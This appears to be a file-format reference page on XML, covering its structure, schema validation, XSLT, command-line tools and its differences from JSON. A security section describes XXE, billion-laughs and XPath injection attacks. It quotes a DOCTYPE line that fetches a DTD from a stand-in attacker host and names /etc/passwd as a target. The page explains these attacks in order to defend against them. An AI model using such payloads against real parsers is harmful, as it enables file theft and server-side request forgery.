.XML Extensible Markup Language
.xml

Extensible Markup Language

XML encodes structured data as nested elements with attributes in human-readable, machine-parseable text. Standardized by the W3C in 1998, XML underpins document formats (DOCX, SVG), SOAP services, configuration files, and data interchange across enterprise systems.

File structure
Header schema
Records structured data
Markup Languageapplication/xmlW3C StandardUTF-8 / UTF-16XSD / DTD1998
By FileDex
Not convertible

Markup format. XML transformation requires XSLT or schema-specific processing.

Common questions

What is the difference between well-formed and valid XML?

Well-formed XML follows syntax rules: proper nesting, quoted attributes, a single root element, and correct escaping. Valid XML is well-formed AND conforms to a schema (XSD, DTD, or RELAX NG) that defines allowed elements, attributes, and data types. A document can be well-formed but not valid.

Is XML still used or has JSON replaced it?

XML remains dominant in enterprise systems, regulated industries (healthcare HL7, finance FpML/XBRL), document formats (DOCX, SVG, RSS), and SOAP web services. JSON replaced XML primarily for REST APIs and browser-side data exchange. Both formats are actively used for different purposes.

What is an XXE attack and how do I prevent it?

XXE (XML External Entity) injection exploits the DOCTYPE entity declaration to read local files, trigger SSRF requests, or cause denial of service via entity expansion. Prevent it by disabling external entity resolution in your XML parser. In Python lxml: etree.XMLParser(resolve_entities=False). In Java: factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true).

Why does my XML parser reject characters like tabs or null bytes?

XML 1.0 forbids most ASCII control characters (0x00-0x08, 0x0B, 0x0C, 0x0E-0x1F) in all contexts, including CDATA sections. Remove or replace these bytes before parsing. XML 1.1 relaxes this restriction but is rarely used.

What makes .XML special

What is an XML file?

XML (Extensible Markup Language) is a markup language designed for storing and transporting structured data. The W3C published the first XML specification in 1998 as a simplified, human-readable alternative to SGML. Unlike HTML, XML has no predefined tags — developers define their own element names to match their data domain. This extensibility made XML the foundation for dozens of specialized formats still in use today.

Continue reading — full technical deep dive

XML is both human-readable and machine-parseable, making it suitable for configuration files, data exchange protocols, document formats, and web services. While JSON has replaced XML for many web API use cases, XML remains dominant in enterprise systems, document formats (DOCX, XLSX, SVG), and regulated industries.

How to open XML files

  • Any web browser — Built-in XML viewer with collapsible tree
  • VS Code (Windows, macOS, Linux) — Syntax highlighting, formatting, XML Schema validation
  • Notepad++ (Windows) — XML tree view with plugin
  • XMLSpy (Windows) — Professional XML editor with visual designers
  • IntelliJ IDEA / WebStorm — IDE-level XML support

Technical specifications

Property Value
Standard W3C Recommendation (1998, XML 1.0; 2004, XML 1.1)
Encoding UTF-8, UTF-16 (required); others declared in prolog
Validation DTD, XSD (XML Schema), RELAX NG
Transformation XSLT stylesheets transform XML to HTML, PDF, other XML
Querying XPath expressions, XQuery language
MIME type application/xml or text/xml

Common use cases

  • Configuration files: web.config (ASP.NET), pom.xml (Maven), AndroidManifest.xml
  • Data exchange: SOAP web services, EDI, financial messaging (FIX, FpML)
  • Document formats: DOCX, XLSX, PPTX, and ODT are ZIP archives containing XML files
  • Vector graphics: SVG (Scalable Vector Graphics) is XML
  • Syndication: RSS and Atom feeds are XML
  • Sitemaps: sitemap.xml files for search engine indexing

XML document structure

<?xml version="1.0" encoding="UTF-8"?>
<catalog>
  <product id="101">
    <name>Widget A</name>
    <price currency="USD">29.99</price>
    <inStock>true</inStock>
  </product>
</catalog>

The optional XML declaration (<?xml ... ?>) appears first. Elements must be properly nested and closed. Attributes appear inside opening tags. XML is case-sensitive (<Name> and <name> are different elements).

XML vs JSON

Feature XML JSON
Comments <!-- comment -->
Attributes ✅ Key-value on elements
Namespaces ✅ (xmlns:)
Schema validation ✅ XSD, DTD ✅ JSON Schema
Verbosity More verbose More concise
Browser parsing Built-in DOMParser Built-in JSON.parse

Validation with XML Schema (XSD)

XSD files define which elements, attributes, and data types are allowed in an XML document. Enterprise systems use XSD to validate incoming data before processing. An XML document is well-formed if it follows XML syntax rules, and valid if it conforms to its associated schema.

XSLT transformations

XSLT (XSL Transformations) stylesheets transform XML into other formats — HTML for display, different XML vocabularies for system integration, or plain text for reporting. XSLT is a declarative language that matches XML nodes with templates and outputs the transformed result. It remains widely used in publishing workflows and legacy enterprise integration.

.XML compared to alternatives

.XML compared to alternative formats
Formats Criteria Winner
.XML vs .JSON
Verbosity
JSON represents equivalent data in 30-50% fewer bytes by eliminating closing tags, attribute syntax, and namespace declarations.
JSON wins
.XML vs .JSON
Schema validation
XSD provides typed validation with inheritance, complex type definitions, and namespace-aware constraints. JSON Schema is capable but less mature for multi-namespace document validation.
XML wins
.XML vs .JSON
Comment support
XML supports inline comments (<!-- ... -->). JSON has no comment syntax per RFC 8259.
XML wins
.XML vs .YAML
Enterprise adoption
XML dominates regulated industries (finance, healthcare, government) with established standards like HL7, FpML, and XBRL. YAML is concentrated in DevOps and cloud-native tooling.
XML wins

Technical reference

MIME Type
application/xml
Developer
World Wide Web Consortium (W3C)
Year Introduced
1998
Open Standard
Yes — View specification

Binary Structure

XML is a text format, not binary. An XML document begins with an optional prolog: the XML declaration (<?xml version="1.0" encoding="UTF-8"?>) specifying version and character encoding, followed by an optional DOCTYPE declaration referencing a DTD or inline entity definitions. The document body consists of a single root element containing nested child elements. Elements are delimited by start tags (<tag>) and end tags (</tag>), with empty elements using self-closing syntax (<tag/>). Elements may carry attributes as name-value pairs within the start tag. Text content, CDATA sections (<![CDATA[...]]>), processing instructions (<?target data?>), and comments (<!-- ... -->) appear within or between elements. Namespaces use the xmlns attribute to partition element names into URI-identified vocabularies. UTF-8 is the default encoding; UTF-16 is also natively supported. Files may start with a UTF-8 BOM (EF BB BF) before the XML declaration, though the W3C recommends against it. Well-formedness requires proper nesting, quoted attribute values, and a single root element. Validation against a schema (XSD, DTD, RELAX NG) enforces structural and type constraints beyond well-formedness.

1996W3C XML Working Group formed to create a simplified subset of SGML for the web1998XML 1.0 published as a W3C Recommendation — first formal specification1999XSLT 1.0 and XPath 1.0 published, enabling declarative XML transformations2001XML Schema (XSD) 1.0 published — typed validation language replacing DTDs for complex schemas2004XML 1.1 published, adding support for Unicode characters forbidden in XML 1.0 (control chars, new scripts)2007XQuery 1.0 and XSLT 2.0 published — mature query and transformation languages2017XSLT 3.0 published with streaming support for large-document transformation without full DOM loading
Validate XML well-formedness with xmllint other
xmllint --noout input.xml

xmllint parses the file and reports well-formedness errors. The --noout flag suppresses output on success, producing output only on error. Exit code 0 means valid.

Validate XML against an XSD schema other
xmllint --noout --schema schema.xsd input.xml

Validates the XML document against the specified XSD schema file. Reports both well-formedness and schema validation errors with line numbers.

Pretty-print (reformat) an XML file other
xmllint --format input.xml > output.xml

Reformats XML with consistent indentation for readability. Useful for minified XML from APIs or machine-generated output.

Extract values with XPath via xmllint other
xmllint --xpath '//product/name/text()' input.xml

Evaluates an XPath expression against the document and prints matching text nodes. Supports full XPath 1.0 syntax for querying element content, attributes, and structure.

Transform XML with XSLT via xsltproc other
xsltproc transform.xslt input.xml > output.html

Applies an XSLT stylesheet to the input XML and writes the result. xsltproc supports XSLT 1.0 and EXSLT extensions. Installed by default on macOS and most Linux distributions.

XML JSON render lossy Web APIs have standardized on JSON. Converting XML responses from legacy SOAP services or government data feeds to JSON enables consumption by modern JavaScript/TypeScript frontends without an XML parser dependency.
XML CSV render lossy Tabular XML datasets from scientific instruments, financial feeds, and government open-data portals need flattening to CSV for import into spreadsheets and SQL databases.
XML HTML render variable XSLT transforms XML data into presentation-ready HTML for publishing workflows, documentation pipelines, and report generation without manual template coding.
HIGH

Attack Vectors

  • XXE (XML External Entity) injection — DOCTYPE entity declarations can reference local files (file:///etc/passwd), internal network URLs (SSRF), or parameter entities that exfiltrate data to attacker-controlled servers
  • Billion laughs attack — exponentially expanding entity definitions (<!ENTITY x10 '&x9;&x9;&x9;...') consume gigabytes of RAM from a few kilobytes of XML, causing denial of service
  • SSRF via external DTD — an XML document referencing an external DTD (<!DOCTYPE foo SYSTEM 'http://attacker.com/evil.dtd'>) causes the parser to fetch a remote resource, enabling server-side request forgery
  • XPath injection — user input concatenated into XPath expressions without sanitization allows authentication bypass and data extraction from XML datastores

Mitigation: FileDex processes XML files entirely in the browser. No external entity resolution, no DTD fetching, no server-side parsing. The browser's DOMParser runs in a sandboxed context with no filesystem or network access from parsed entities.

xmllint tool
Command-line XML validator and formatter from libxml2 — installed by default on macOS and most Linux
xsltproc tool
Command-line XSLT processor from libxslt — applies XSLT 1.0 stylesheets to XML documents
lxml library
Python binding for libxml2/libxslt — fast XML/XSLT processing with XPath and schema validation
Saxon tool
XSLT 3.0 / XQuery 3.1 processor — the reference implementation for advanced XML transforms
xmltodict library
Python library that converts XML to/from Python dicts — simple XML-to-JSON bridge
fast-xml-parser library
Fast XML to JSON/JS-object parser for Node.js — no native dependencies